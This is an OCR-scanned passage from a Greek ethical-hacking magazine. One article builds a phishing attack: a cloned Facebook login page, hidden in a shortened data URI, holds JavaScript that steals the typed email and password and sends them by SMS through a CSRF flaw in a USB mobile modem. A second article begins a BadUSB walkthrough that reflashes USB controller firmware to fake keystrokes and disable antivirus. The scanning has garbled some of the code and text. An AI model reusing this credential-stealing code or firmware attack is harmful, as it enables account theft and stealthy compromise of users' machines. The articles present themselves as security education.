TONIKA και κατὰ πάσα πιθανότητα ano κὠδικα σε JavaScript. Ευθὺς αμέσως ζητήσαμε 
ano Tov browser να µας δείξει τον κὠδικα της σχετικἠς σελίδας του web interface, 
και αρχίσαμε το ψάξιμο. Πολύ σύντομα εντοπἰσαµε την ακόλουθη ρουτίνα: 


1. Τουλάχιστον μέχρι τη στιγµἠ που γράφεται το άρθρο. 
2. Στην πράξη ὀχι ano το χρήστη, αλλά ano τον browser του χρήστη, ὀπου έχει αποθηκευτεί κἄποιο cookie. 
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function encodeSendMessage(input) { 


var result_encode = ""; 


var result_org = 3 


var result = 3 


var flag = 0; 


if(input==null || input=="") { return result; } 


for(var i=@:i<input.length:i++) { 
var c=input.charCodeAt(i).toString(16) ; 


result_org = result_org + C; 


d(e lense S= Ὦ) a ΠΕ 5 als ἢ 
if(c.length==1) { c="@@0"+c; } 
else if(c.length==2) { c="@0"+c; } 
else if(c.length==3) { c="@"+c; } 
result_encode = result_encode + c; 


} 


if(flag == 1) { return result_encode; } 


else if(flag == @) { return result_org; } 


H κωδικοποίηση πραγματοποιείται μέσα στο βρὀχο for. H μέθοδος charcodeAt() επι- 
στρέφει KAGE φορά τον κωδικό Unicode ενὸς χαρακτήρα ano το δεδομένο string (το 
μήνυμά µας). Ακολούθως, η μέθοδος toString() μετατρέπει GUTOV τον KWOIKO σε µια 
δεκαεξαδικἠ τιµή κι αυτἠ την τιµή σε string. H αρχικἠ µετατροπἠ σε δεκαεξαδικἡ 
τιµή προσδιορίζεται ano την παράμετρο nou ἐχει δοθεί στη μέθοδο (to 16). Οι υπὀ- 
λοιπες γραμμές κὠδικα μέσα στο βρὀχο και στη ρουτίνα γενικότερα δεν αφορούν 
στην ἴδια την κωδικοποίηση αλλά στον υπολογισμό κάποιων ἄλλων (ἀσχετων για 
τη δικἠ µας μελέτη) μεγεθών. Επομένως, η παράξενη κωδικοποίηση του μεγέθους 
msg_content αποτελούσε την αναπαράσταση των κωδικών Unicode των χαρακτή- 
PWV του μηνὑματόὸς µας, μετά τη μετατροπὴ τους σε δεκαεξαδικὲς τιμὲς. 


Αφού καταφέραμε να ερμηνεύσουμε ὁλα τα πεδία του αιτήματος POST που στέλνει 
ο browser για την αποστολή ενὸς SMS, μπορούσαμε πλέον να Ta αναπαράγουµε. 
Ἡμασταν σε θέση να δημιουργήσουμε αιτήματα POST, που av τα λάμβανε το modem 
θα ἐστελνε κάποιο SMS. Κι όλα αυτά χωρίς να ζητηθεἰ κάποιος κωδικὸς και χωρίς 
να παραπονεθεἰ κανεὶς για το γεγονὸς OT! το αἰτημα ἦρθε στα ξεκάρφωτα κι OX! απὀ 
κάποια σελἰδα του web interface! Ας δούμε πὠς εκµεταλλευτήκαμε εμεἰς την UNO 
συζήτηση ευπάθεια. 
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Ηλεκτρονικό ψάρεμα 


H ιδέα µας ενέπλεκε τη YVWOTN σε ὁλους µας τεχνικἡ του phishing - την ὑπουλη 
κλοπή προσωπικὠν δεδομένων απὀ κάποιον ανυποψίαστο χρήστη. Πώς θα σας pal- 
νόταν αν καταφέρναμε να κλέψουμε τα στοιχεία σύνδεσης σε κάποια υπηρεσία κι 
εξασφαλἰζαµε την αυτόματη αποστολἠ τους στο κινητὀ µας µε Eva SMS; H ιδέα ouv- 
δυάζει όλα όσα έχουμε αναφέρει ως τώρα κι αναδεικνύει τη σοβαρότητα του ζητήμα- 
τος. Βέβαια, ὀλες οι TEXVIKEG ηλεκτρονικού ψαρέματος περιλαμβάνουν και κἄμποση 
κοινωνικἠ μηχανικἠ. Προὐποθέτουν, δηλαδή, vav µη-τεχνικὸ τρόπο προσέγγισης 
του θύματος, µια αρχικἡ απάτη, που θα ἐχει ως συνέπεια να κερδίσουμε την εμπι- 
στοσύνη του κι ενδεχομένως να αποσπάσουµε μερικὲς πρὠτες πληροφορίες. Όπως 
καταλαβαίνετε, στο παρὀν άρθρο δεν θα ασχοληθούμε µε αυτό το κομμάτι, αλλά θα 
εστιάσουµε στο καθαρά TEXVIKO μέρος. 


Πα την επίθεση στο mobile modem εκμεταλλευτήκαμε την ευπάθεια CSRF που 
παρουσιάζει η υπηρεσία αποστολἠς μηνυμάτων. Ταυτόχρονα αξιοποιήσαµε και µια 
δυνατότητα των σύγχρονων browsers, που αν και δεν εἶναι ιδιαίτερα δηµοφιλής 
προσφέρει τεράστια ευελιξία’. Πρόκειται για την υποστήριξη του επονομαζόμενου 
data URI scheme. Το data URI scheme αποτελεἰ Evav τρόπο ενσωμάτωσης των δε- 
δομένων αλλά και TOU κὠδικα µιας ιστοσελἰδας, σε κάτι που μοιάζει µε URL. AUTO το 
ειδικὀ URL ἐχει τεράστιο μήκος κι όταν το τροφοδοτούμε σε κάποιον browser αυτός 
συμπεριφέρεται σαν να συνδέθηκε σε κάποιον web server: Αντλεἰ και παρουσιάζει 
(κάνει render) τα δεδομένα, ενώ αρχίζει και την εκτἐλεση ὀποιων scripts εντοπίσει 
(σε JavaScript). Αναρωτιέστε γιατὶ να καταφύγουµε σε κάτι τέτοιο; O λὀγος εἶναι 
anAoc. Με τη βοήθεια των data URI θα μπορούσαμε να κατασκευάσουµε µια πλαστἠ 
σελἰδα για την κλοπή των στοιχείων σύνδεσης του θύματος, χωρίς να μπλέξουμε 
µε το στήσιμο κάποιου web server. Άλλωστε, τα κλεμμένα δεδοµένα θα ἐρθουν 
απευθείας στο κινητὀ µας και δεν θα χρειαστεἰ να αποθηκευτούν σε κἄποιο αποµα- 
KPUOHEVO μηχάνημα. 


Πα τις ανάγκες της παρουσἰασης αποφασἰίσαµε να κλέψουμε τα στοιχεία σύνδεσης 
του Facebook. Έτσι, µεταβήκαμε στη σελἰδα σύνδεσης της δημοφιλούς υπηρεσίας 
και πατήσαμε το συνδυασμό πλήκτρων [CTRL+U], ὡστε ο browser να εμφανίσει τον 
κώδικα της σελἰδας. Αντιγράψαµε ολόκληρο τον κὠδικα και τον αποθηκεύσαµε σε 
va αρχείο απλού κειµένου. Στη συνέχεια ξεκινήσαμε τις απαραίτητες προσθήκες, 
MOTE η σελἰδα µας να εκμεταλλεύεται την ευπάθεια CSRF και να στέλνει Eva SMS µε 
τα στοιχεία σύνδεσης του θύματος. Πα να πετύχουμε όλα αυτά, γράψαμε το ακὀλου- 
θο προγραμματάκι σε JavaScript: 


function steal_credentials() { 
var u = document.getElementById("email").value; 
var p = document.getElementById("pass").value; 
VE m [PE 
var e = encodeSendMessage(c); 
var http = new XMLHttpRequest(); 
var url = "“http://192.168.0.1/sms/sendSms"; 


var c = u + 


3. Όχι κατ' ανάγκη στους επιτιθέµενους ;) 
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var params = "rd=0.93324562345664398?basic_apply=Send&phone_number_ 
receiver=&SMS_Content="+c+"&save_msg_id=ð&which_cgi=new_message&encode_ 
type=ASCII&msg_content="+e+"&phone_number_sender= "αριθμός παραλήπτη”; 


http.open("POST", url, false); 
http.send(params) ; 
} 


function encodeSendMessage(input) { 


var result_encode = 


var result_org = 


var result = s 


var flag = 0; 


if(input==null || input=="") { return result; } 


for(var i=@:i<input.length:i++) { 
var c=input.charCodeAt(i).toString(16) ; 
result_org = result_org + C; 
meena S= 9) 1 ΠΕ: = als } 
if(c.length==1) { c="@@0"+c; } 
else if(c.length==2) { c="@0"+c; } 
else if(c.length==3) { c="@"+c; } 
result_encode = result_encode + c; 


} 
if(flag == 1) { return result_encode; } 


else if(flag == @) { return result_org; } 


O κὠδικας nou γράψαμε ξεκινά αντιγράφοντας τα στοιχεία εισόδου του θύματος, 
ano τη σχετικἠ φόρμα συμπλήρωσης της σελἰδας (πεδία email και pass). Στη ou- 
νέχεια συνδυάζει τα δύο στοιχεία για το σχηματισμὀ ενὸς μικρού μηνύματος. Ava- 
φερόμαστε στη µεταβλητή c, της οποίας το περιεχόμενο αποτελεί TO SMS που θα 
αποσταλεὶ στο κινητό µας. Στη συνέχεια, η συγκεκριµἑνη μεταβλητἠ τροφοδοτείται 
στη συνάρτηση encodeSendMessage(). Πρόκειται για τη συνάρτηση που εἰδαμε και 
νωρίτερα, στον κὠδικα JavaScript Tou web interface του modem. Με τη βοήθειά της 
κωδικοποιούμε το προς αποστολή μήνυμα και παράγουμε το μέγεθος msg_content. 
AUTO το μέγεθος απαιτείται για το σχηματισμὀ του κατάλληλου HTTP request, που 
θα ἐχει ως συνέπεια την αποστολἠ του SMS! O σχηματισμός του σχετικού αιτήματος 
ξεκινά αμέσως μετὰ την κλήση της συνάρτησης encodeSendMessage(). Σε αυτό το 
σημείο ενδιαφἐρον παρουσιάζει ο ορισμὸς της μεταβλητἠς url. H τιµή της αποτελεἰ 
τη διεύθυνση της σελίδας Tou web interface, που επιτρέπει την αποστολἠ μηνυμά- 
των. Αυτή η διεύθυνση ενδέχεται να αλλάζει ano modem σε modem και πρέπει να 
υπογραμμίσουμε ὁτι η επἰθεσἠ µας εἶναι προσαρμοσμένη στις συσκευὲς που διαθέἑ- 
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[Fi Welcome to Facebook - L x 


€ > C DD datatexy/plain;charset=utf-8:base64,PCFETONUWVBFIGhObWw-+ DQo8aHRtbCBSYWSnPSJIbilgaWQIImZhY2Vib29rliBjoGFzczOl 


Email or Phone Password 


facebook 


Sign Up 
Connect with friends and the It’s free and always will be. 


world around you on Facebook. : 
First name Last name 


Email or mobile number 
See photos and updates from friends in News Feed. 


Re-enter email or mobile number 


; : - μη 
Share what's new in your life on your Timeline. New password 


Birthday 


Find more of what you're looking for with Graph Search. Month ¥ | Day ¥ Year v ων 
irthday’ 


‘Female “ Male 


By dlicking Sign Up, you agree to our Terms and that you have 
read our Data Use Policy, including our Cookie Use. 


Create a Page for a celebrity, band or business. 


O δικτυακός τόπος του Facebook. Όλα μοιάζουν φυσιολογικά κι εντελώς αθώα, 
μέχρι τη στιγµή που παρατηρούμε τη μπάρα διευθύνσεων! Στη θέση που έπρεπε 
να δούμε το URL του Facebook, βλέπουμε Eva τεράστιο data URI scheme. Μέσα σ' 
αυτό το URI βρίσκονται όλα ὁσα βλέπουμε, καθώς κι ο κακόβουλος κὠδικάς µας! 


TapE εμεὶς. Ας επιστρἐψουµε στον κὠδικα όμως. Πα τον σχηματισμὀὸ του αιτήματος 
που θα εξαναγκάσει TO modem να µας στείλει Eva SMS, έχουμε δημιουργήσει µια 
μεταβλητή ονόματι params, η οποία φιλοξενεί ὀλες τις παραμέτρους που περιμένει 
το web interface του modem. Ανάμεσα σε αυτές θα δείτε και την παράμετρο rd, µε 
την οποία δεν ασχοληθήκαµε προηγουμένως. Κατὰ τις δοκιμὲς µας δεν καταφέραμε 
να διαπιστώσουμε τη χρησιμότητα αυτού του μεγέθους, αλλά διαπιστώσαμε ὁτι ἦταν 
πάντα σταθερὀ. Επομένως, φροντἰσαμε να το ενσωματώσουμµε και στα δικἁ µας al- 
τήµατα προς To web interface. 


Ὅπως εἰπαμε, το παραπάνω πρὀγραμμα προστέθηκε στο αρχείο µε τον κώδικα της 
σελίδας σύνδεσης του Facebook. Με αυτὀν τον τρόπο εἶχαμε ολοκληρώσει την Ka- 
τασκευἠ της κακὀβουλης σελίδας, που θα ἐκλεβε και θα μὰς EOTEAVE τα στοιχεἰα 
σύνδεσης του θύματος. Σειρἀ εἰχε ο σχηματισμὸς του κατάλληλου data URI, που 
θα ενσωμάτωνε ὁσα εἰχαμε ετοιμάσει. Πα το σκοπὀ αυτό στραφἠκαμµε σ' Eva δικτυ- 
ako εργαλείο που βρἰσκεται στη διεύθυνση http://dopiaza.org/tools/datauri/index. 
php. Εκεί, δώσαμε ολόκληρο το αρχείο µε τον κὠδικα της κακὀβουλης σελἰδας µας. 
Το αποτέλεσµα ἦταν µια τεράστια γραμμὴ ano φαινομενικἀ τυχαίους χαρακτήρες. 
Βέβαια, κανένας λογικὀς ἄνθρωπος δεν θα εμπιστευόταν va τόσο μακροσκελὲς και 
σχεδὸν αποκρουστικὀ URL! Έτσι, κάναμε μία βόλτα και ano κἀποια υπηρεσία opi- 
κρυνσης URL (π.χ., http://tinyurl.com), στην οποία δώσαμε το τεράστιο data URI και 
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πήραμε Eva μικρὸ και χαριτωμένο URL :P Αυτό που peve πλέον ἦταν η προώθηση 
του ὑπουλου URL σε κάποιο θύμα-χρήστη USB modem. Δεν επιδοθἠκαµε, φυσικὰ, 
στο social engineering. Πραγµατοποιήσαµετις δοκιμὲς µας σε OIKG µας μηχανήματα, 
παϊζοντας το διπλὸ ρὀλο θύτη κι ανυποψἰαστου θύματος. E, λοιπὀν, σας πληροφο- 
ρούμε ὁτι ο κὠδικάς µας λειτούργησε άψογα και σε ελάχιστο χρόνο παραλάβαμε Eva 
μήνυμα µε τα κλεμμένα credentials. 


Επιστηµονικἠ φαντασία e0000 COSMOTE 16:02 Ὁ 58% ML} 


ο... < Back Contact 


Πολλοί θα σπεύσουν va πουν ὁτι το 


σενάριο που περιγράψαμε εἶναι napa- πμ 
τραβηγµένο και δεν θα μπορούσε va Today 16:00 
υλοποιηθεί στον npayyaTIKO κὀσμο. f 
Προφανώς, δεν θα μπορούσαμε να ισχυ- someuser01 @delta.com:sil 
ριστούµε NOTE OT! ο κώδικας που παρου- lypasdword 


oldoaue δουλεύει µε κάθε Modem, αφού 
κάθε συσκευἠ EXE! το δικό της software. 
Ωστόσο, πρέπει να υπενθυμίσουμε ὁτι οι 
δικὲς µας δοκιμὲς ἐγιναν σε δύο διαφο- 
ρετικἀ modems, διαφορετικών δικτύων 
τηλεφωνίας και µε ὀλεςτις ενημερώσεις 


εφηρμοσμένες. Επομένως, εἶναι βάσιμο H επίθεση στέφθηκε µε επιτυχία. 
Από τη στιγµή που το θύμα τσίµπησε στο 


VOTO XUPIOTOUE on ay ΠΕ ΤΕΕ -πσ ἀρεμά µας, συνδέθηκε στο EIKOVIKO 
θοδο µε την οποία εργαστήκαµε και δεν Facebook µε τα αληθινά του στοιχεία. 
αντιγράψετε τυφλά ὁσα κάναμε, εἰναι oi- Αναρωτιέστε για το αποτέλεσµα; Το 
γουρο ότι κι εσεἰς θα τα καταφέρετε. modem του θύματος EOTEIAE Eva ωραιό- 

τατο SMS στο κινητό µας, µε τα στοιχεία 
Ἕνα συμπέρασμα που προκύπτει and dca σύνδεσης που πληκτρολογήθηκαν. 


εἰδαμε, εἶναι ὁτι οι κατασκευαστὲς EXOUV 
επαναπαυθεἰ στο γεγονὸς ὁτι η τεχνο- 
λογία του mobile Internet δεν μπορεὶ -. 
να "διαπεραστεί" τοπικά. Ma την wpa, [5η 
τουλάχιστον, εἶναι πρακτικἀ αδύνατο va 
επιτεθεὶ κανεὶς στο interface της συσκευής, η οποία μιλάει µε το δίκτυο κινητής τη- 
λεφωνίας. Το σενάριο που παρουσιάσαµε ἦταν σχετικἀ ανώδυνο, αφού αφορούσε 
στην υποκλοπή των στοιχείων σύνδεσης στο Facebook. Δεν θα ἦταν ὁμως τραγικὀ 
αν κατάφερνε κανεὶς να κλέψει µε την ἰδια άνεση τα στοιχεία σύνδεσης σε τραπεζικὀ 
λογαριασμὀ ἡ σε κἀποια ἄλλη, εξίσου ευαἰσθητη δικτυακἠ υπηρεσία; Τέτοιου εἰδους 
ερωτήματα πρέπει να απασχολούν τους επικεφαλεἰς TEXVIKOUG στις εταιρἰες κινητής 
τηλεφωνίας, και να φροντίζουν WOTE το λογισμικὀ τους να µην παρουσιάζει τόσο 
βασικὲς ευπάθειες. 


Send 


Τέλος, npénel να ξεκαθαρίσουµε OT! η παρουσἰασἠ µας εἰχε καθαρὰ εκπαιδευτικὀ 
σκοπὀ. Το ζήτημα για εμάς εἶναι να αποκτάµε ολοένα και βαθύτερη γνώση των ou- 
στημάτων που µας περιβάλλουν, ώστε να ξέρουμε NOTE, πὠς και ano τι να φυλα- 
γόμαστε. Με την ευκαιρία, µια χρήσιμη συµβουλἠ που μπορούμε να δώσουμε σε 
γνωστούς και φίλους, εἶναι να τσεκάρουν πάντα το περιεχόµενο της μπάρας διευ- 
θύνσεων του browser και να µην ξεγελιούνται ano αυτά που βλέπουν. Εξάλλου, τα 
μηνύματα που µας ζητούν ἡ προτείνουν να συνδεθούμµε σε κάποιον δικτυακὀ τόπο, 
πρέπει να τα αντιμετωπίζουμε πάντα µε μεγάλη προσοχή. 
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To deltaHacker είναι το ένα και μοναδικό 
περιοδικό µε θεματολογία το ethical 
hacking, τα δίκτυα και την ασφάλεια, τον 
προγραμματισμό και τα ηλεκτρονικά. 


Το deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για τρίτη χρονιά στη σειρά 
έρχεται κατευθείαν σ' εσάς. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους ως άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα 
δίκτυο που αρχίζει και τελειώνει µε το Facebook 
και το Twitter, τότε είναι 109% βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε µήνα. 


Παραγγείλετε τώρα µία από τις συμφέρουσες 
συνδρομές από το 


http://deltahacker.gr/pdf12order 
(ηλεκτρονική έκδοση) 


ή από το 
http://deltahacker.gr/order 
(έντυπη έκδοση, έως το τεύχος 019) 


Σηµείωση: Την ύλη όλων των τευχών που 
έχουν κυκλοφορήσει ως τώρα µπορείτε να τη 
βλέπετε στο 


deltahacker.gr/category/magazine-issues 


os 


soe 


Skill: Advanced 
Tags: USB stick, boot mode, phison, memory controller, rubber ducky 


by Όγθυ Tom 


Η ὑπουλη ευπάθεια του BadUSB 


Ὅταν συζητάμε για την ασφάλεια των USB sticks, οι περισσότεροι ἄνθρωποι 
σκέφτονται τη μόλυνση ano ιούς, Trojan horses κι ἄλλα εἶδη κακὀβουλου 
λογισμικού. Τι γίνεται όμως ὀταν μολύνεται το ἴδιο To firmware της συσκευής; 
Τότε μπορεῖ να συμβεί KUPIOAEKTIKG οτιδήποτε, µε TO antivirus κι όλα τα 
συστήματα προστασίας να κοιμούνται τον ύπνο του δικαΐἰου... 


H ύπουλη ευπάθεια tou BadUSB 
OL κκ“ κἛἛἽἛααα 


Σχεδὸν καθημερινά διαβάζουμε ειδήσεις για καινούριες ευπάθειες που ανακαλύπτο- 
νται στα λειτουργικά, στις συσκευὲς και στα πάσης φύσεως πληροφοριακά συστή- 
ματα. Λίγες εἶναι οι φορὲς, όμως, που µια ευπάθεια εἶναι τόσο σηµαντικἠ ώστε να 
συζητηθεὶ κι ano ἄτομα εκτὸς του χώρου της Πληροφορικής. Έτσι, λἰγο πριν την 
κρίση µε Tov Ebola, αναφέρθηκε στα ΜΜΕ και µια ευπάθεια που επηρεάζει *OAEc* τις 
συσκευὲς USB. Αναφερόµαστε στο BadUSB, που παρουσιάστηκε στο συνέδριο Black 
Hat USA 2014 ano τους Karsten Nohl και Jakob Lell. Οι εισηγητέὲς του θέματος OE- 
@pnoav τόσο ONUAVTIKN κι επικίνδυνη τη συγκεκριμένη ευπάθεια, που αποφάσισαν 
να µη δημοσιεύσουν τον κὠδικά τους. Και πάνω που κοντεύαµε να ξεχάσουµετο ὁλο 
θέμα ἠρθε To Derdycon, µε τους Adam Caudill και Brandon Wilson να παρουσιάζουν 
ἑνα παρόμοιο θέμα και να δίνουν τον κὠδικά τους απλὀχερα. H ευπάθεια που napou- 
σἰασαν οι ερευνητὲς αφορά σε όσες συσκευὲς διαθέτουν ἑνα συγκεκριµένο Memory 
controller ano την Phison electronics. Μη φανταστείτε ὁτι μιλάμε για ἑνα μικρό KOH- 
μάτι της αγοράς, στο οποίο ανήκουν ελάχιστες και δυσεύρετες συσκευὲς. Το πλήθος 
των USB flash drives που στηρἰζονται στο συγκεκριμένο τσιπ εἶναι αρκετά μεγάλο. 


Η φύση της ευπάθειας 


Στοιχηματίζουμε τώρα ὁτι σας ἐχουν ðn- 
μιουργηθεί αρκετά ερωτηματικά. Λογικὀ. 
Ας πάρουμε τα πράγματα ano την αρχἡ 
κι ας ξεκινήσουμε and τους memory 
controllers. Πρὀκειται για Eva ψηφιακὀ 
κύκλωμα, το οποίο στην περίπτωση των 
USB flash drives βρίσκεται αμέσως μετὰ 
το κύκλωμα USB κι αμέσως πριν ano τα 


τσιπακια µνήµης. Το κύκλωμα USB με- Ένα USB stick µε Tov controller Phison 2251-03. 
ταδίδει στον υπολογιστή τα δεδοµένα Πα να ενεργοποιηθεί το boot mode της συσκευ- 
που παρέχει ο memory controller και σ' ἧς, πρέπει να ενωθούν οι ακροδέκτες 2 και 3. Η 

f ' αρίθµηση των ακροδεκτών ξεκινά ano τη γωνία 
αυτον (στον controller) παραδίδονται τα του τσιπ που σημειώνεται µε την κουκίδα και 
δεδοµένα που στέλνει ο υπολογιστής. E, προχωρά κατά τη θετική φορά. 


λοιπὀν, η ευπάθεια που εξετάζουμε αφο- 

pd σε αυτὀ ακριβώς το κομβικὀ εξάρτημα. Οἱ controllers αποτελούν vav µικροε- 
λεγκτἠ εξοπλισμένο µε ειδικἁ περιφερειακἀ για τη συγκεκριμένη δουλειά. Με απλά 
λόγια, οι controllers εἶναι προγραμματιζὀμενοι! Το πρόβλημα µε Tov controller ano 
τη Phison ἐγκειται στο γεγονὸς ὁτι εἶναι ξεκλείδωτος και επιτρέπει σε οποιονδήποτε 
τον επαναπρογραμματισμὀ του. O κὠδικας που δημοσίευσαν οι Adam Caudill και 
Brandon Wilson αποτελεἰ µια τροποποιημένη εκδοχἠ του firmware Tou controller. 
Μαζὶ µε τον κὠδικα προσφέρονται και Ta απαραίτητα εργαλεία (προγράµµατα για 
τη γραμμὴ εντολών των Windows) που επιτρέπουν τον επαναπρογραμματισμὀ του 
controller, όπως επἰσης και τον "εμπλουτισμό" Tou firmware µε διάφορα payloads. 
Με τη βοήθεια αυτού του πακέτου μπορούμε να πάρουμε Eva αθώο USB flash drive 
και να του προσδώσουµε διάφορες νέες δυνατότητες, ὅπως η ὑπουλη τροποποίηση 
αρχείων, η σιωπηρή αλλαγή των ρυθµίσεων DNS του συστήματος, η μίμηση του 
πληκτρολογἰου για την παράνομη εισαγωγἠ κειµένου κ.ά. 


Κάτι που έχουμε παραλείψει να πούμε τόση ὠρα, εἰναι ὁτι η επίθεση σ' Eva σύστη- 
μα µε USB που φέρει τροποποιημένο firmware εἶναι απλά *aduvaTo* να ανιχνευθεὶ 
και πολύ περισσότερο να αντιμετωπιστεί απὀ κάποιο antivirus, antimalware ἡ ὁπι 
Βηϊἰ-κἀτι μπορούμε να φανταστούμε. Πα το λειτουργικὀ σύστημα, αυτό που συμβαἰ- 
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νει εἶναι ὁτι ο χρήστης προσθέτει µια νὲα συσκευή. Αυτή η διαδικασἱα δεν γίνεται 
αντιληπτή ano τα προγράμματα προστασίας που αναφέραμε, αλλά ακόµα κι αν γινὀ- 
ταν δεν θα εἶχαν λὀγο να παρέμβουν -- και οὐτε θα μπορούσαν! 


Στο παρὀν άρθρο θα αξιοποιήσουµε τον κὠδικα που δημοσιεύτηκε για να πραγµα- 
τοποιήσουµε Eva USB HID! attack. Συγκεκριμένα, το πειραγμένο USB θα παριστάνει 
το πληκτρολόγιο και θα στέλνει στο σύστημα εκείνα τα πατήματα πλήκτρων, που 
θα xouv ως αποτέλεσµα την απενεργοποίηση του AVG antivirus. Μπορεί αυτή η 
επίθεση να μοιάζει εξαιρετικἁ στοχευμένη, αλλά, ὁπως θα διαπιστώσετε σύντομα, η 
τροποποἱησή της για την αποστολἠ διαφορετικών πλήκτρων εἶναι πανεύκολη. 


Τα σύνεργα 


Ὅπως εἰπαμε, η τεχνική που θα παρουσιάσουμε δεν αφορά σε όλες τις συσκευές 
USB, αλλά μόνο σ' εκείνες που στηρἰζονται σε controllers της Phison και συγκεκρι- 
μένα στο μοντέλο 2251-03 (2303). Αυτό δεν σημαίνει ὁτι υπόλοιποι controllers της 
Phison εἶναι ασφαλεἰς ἡ ασύμβατοι, κι dpa δεν διατρέχουν κἰνδυνο. O κὠδικας που 
ἐχει δημοσιευτεί, όμως, γράφτηκε για το συγκεκριµένο μοντέλο. Έτσι, για τις δοκι- 
μὲς µας στραφήκαμε σε Eva USB stick µε τον ἰδιο ΧακριβώςΧ ελεγκτἠ. Συγκεκριμὲ- 
να, χρησιμοποιήσαμε ¿va Kingston DataTraveler G4 στα 64GB. 


Πα την πραγματοποίηση της επἰθεσης θα χρειαστούμε κατ' αρχάς τον πηγαἰο κὠδικα 
που δημοσιεύτηκε. Το πακέτο µε τον κὠδικα και μερικὰ χρήσιμα εργαλεία βρίσκεται 
στη θἐση 


https://github.com/adamcaudill/Psychson/archive/master.zip 


Επειδἠ ο κὠδικας εἶναι γραμμένος σε C#, θα χρειαστούμε KI Eva σύστημα µε 
Windows, στο οποίο πρέπει να ἐχουμε εγκαταστήσει το .NET 4.0, το Visual Studio 
Express 2012 (http://bit.ly/getvse2012) για τη μεταγλώττιση του κὠδικα, καθώς 
και Το Small Device C Compiler (http://sdcc.sourceforge.net). Στην πορεία του ap- 
θρου θα θεωρήσουμε ὁτι το εν λόγω πρόγραμμα εἶναι εγκατεστημένο στη θἐση C:\ 
Program Files\SDCC. 


Κρίσιµη επισήμανση: O κὠδικας nou θα χρησιμοποιήσουμε βρἰσκεται ακόµα σε 
πειραματικὀ στάδιο ανάπτυξης κι ενδέχεται να προκαλέσει προβλήµατα σε κάποιες 
OUOKEUEG. Τα προβλήματα κυμαίνονται απὀ την απώλεια δεδομένων μέχρι και την 
αχρήστευση (bricking) του USB stick. Π' αυτούς τους λόγους θα ἦταν φρόνιμο va 
κάνετε ἑνα backup των δεδομένων σας, ὁπως επἰσης και να µη χρησιμοποιήσετε 
κάποιο πανάκριβο USB stick. 


Πρώτη επαφἠ 


Αφού προσθέσουμε στο σύστημα όλα ὁσα αναφέραμε προηγουμένως, ξεκινάμε 
ανοίγοντας To command line των Windows (cmd.exe) µε δικαιώματα διαχειριστἠὴ 
συστήματος (run as Administrator). Ano εκεἰ µεταβαίνουμε στη θἐση ὁπου αποθη- 
κεύσαµε το πακέτο µε τον πηγαίο κὠδικα και συγκεκριµένα στον κατάλογο tools. 
Εμεὶς εἶχαμε τοποθετήσει ολόκληρο το πακέτο στον κατάλογο c:\psychson-master 
κι ETO! δώσαμε το εξἠς: 


cd c:\psychson-master\tools 


1. Human Interface Device: Πρόκειται για τον τύπο που αποδίδεται σε συσκευές όπως τα πληκτρολόγια, τα Ποντίκια, οι γραφίδες, τα πάσης 
φύσεων καταδεικτικἁ κ.λπ. 
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Το πρώτο πρᾶγμα που κάνουμε εἶναι να πάρουμε ορισμένες πληροφορίες για τη 
συσκευἠ που θα χρησιμοποιήσουμε. Έτσι, αφού τη συνδἑέσουµε στον υπολογιστή, 
εκτελούμε το DriveCom: 


drivecom.exe /drive=E /action=GetInfo 


Στην παράμετρο drive δίνουμε TO γράμμα που ἐχει αντιστοιχιστεἰ στο USB stick ano 
το σύστημα. Όπως βλέπετε, στη δικἠ µας περίπτωση ἦταν το "E". H εκτέλεση του 
προγράμματος εμφανίζει τον τύπο του controller της συσκευής, την ἐκδοση του 
firmware και το αναγνωριστικὀ ID για To τσιπάκι μνήμης flash. 


Πα την εγκατάσταση του νέου firmware θα χρειαστούμε Kal το λεγόμενο burner 
image. Πρόκειται για Eva εκτελέἐσιµο γραμμένο και µεταγλωττισμένο για µικροε- 
λεγκτὲς αρχιτεκτονικής 8051. Το συγκεκριμένο πρόγραμμα "εγκαθίσταται" στον 
controller κι επιτρέπει την εγγραφἠ του νέου firmware στη μνήμη flash. Πα την 
εύρεση του burner image θα στραφούμε στο Google. Πριν ξεκινήσουμε την avai- 
τηση, ὅμως, πρέπει να ξέρουμε το ακριβὲς ὀνομα του αρχείου. H γενική µορφή για 
τα ονόματα των burner images εἶναι η ακόλουθη: BNxxVyyyz.bin. Στη θἐση των xx 
πρέπει να τοποθετήσουµε την ἐκδοση του controller, στη θέση των yyy συμπλη- 
ρώνουμε την ἐκδοση του εργοστασιακού firmware και στη θέση του z δίνουμε τον 
κωδικὀ που αντιστοιχεἰ στο τσιπ μνήμης της συσκευἠς µας. H ἐκδοση Tou controller 
εμφανίζεται αµέσως μετά τον αριθµὀ μοντέλου. Στη δικἠ µας περίπτωση ο ζητούμε- 
νος αριθµός ἦταν ο 03, αφού η συσκευἠ µας διέθετε τον EAEYKTN PS2251-03 (2303). 
Tov αριθµό ἐκδοσης του εργοστασιακού firmware τον βρίσκουμε πανεύκολα, µε τη 
βοήθεια του DriveCom. Τέλος, για τον κωδικὀ που αντιστοιχεἰ στο τσιπ μνήμης ισχύ- 
ουν οι ακόλουθες αντιστοιχίσεις: 


ο 2KM για 2K NAND chips 
ο 4KM για 4K NAND chips 
ο M yia 8K NAND chips 


Το δικὀ µας USB stick (των 64GB) διέθετε τα μεγαλύτερα τσιπάκια μνήμης (8K) και 
κατά συνέπεια ο αντίστοιχος κωδικὀς ἦταν το "M". Έτσι, το ὀνομα που σχηµατίσαµε 
για To burner image εἶχε ως εξἠς: BNO3V103M.bin. Αυτό ακριβώς αρχίσαμε ν' ava- 
ζητάμε στο Google. Όταν το βρήκαμε το κατεβάσαμµε και το αποθηκεύσαµε σε µια 
βολικἠ θέση, αφού θα µας χρειαζόταν πολύ σύντομα. 


Πα οποιαδήποτε επέμβαση στο firmware της συσκευής, πρέπει προηγουμένως να 
την έχουμε θέσει σε κατάσταση Boot mode. Κάτι τέτοιο μπορεἰ να γίνει µε δύο τρὸ- 
πους: Μέσω software ἡ µέσω hardware. Στην πρὠτη περίπτωση χρησιμοποιούμε και 
πάλι το πρόγραμμα DriveCom: 


DriveCom.exe /drive=E /action=SetBootMode 


Αν η συσκευἠ εισέλθει σε boot mode µε επιτυχία, TO LED θα ανάψει και θα napauei- 
νει αναμμένο. Αν δεν συμβεί κάτι τἐτοιο, πρέπει να στραφούµε στο hardware. Οφεἰ- 
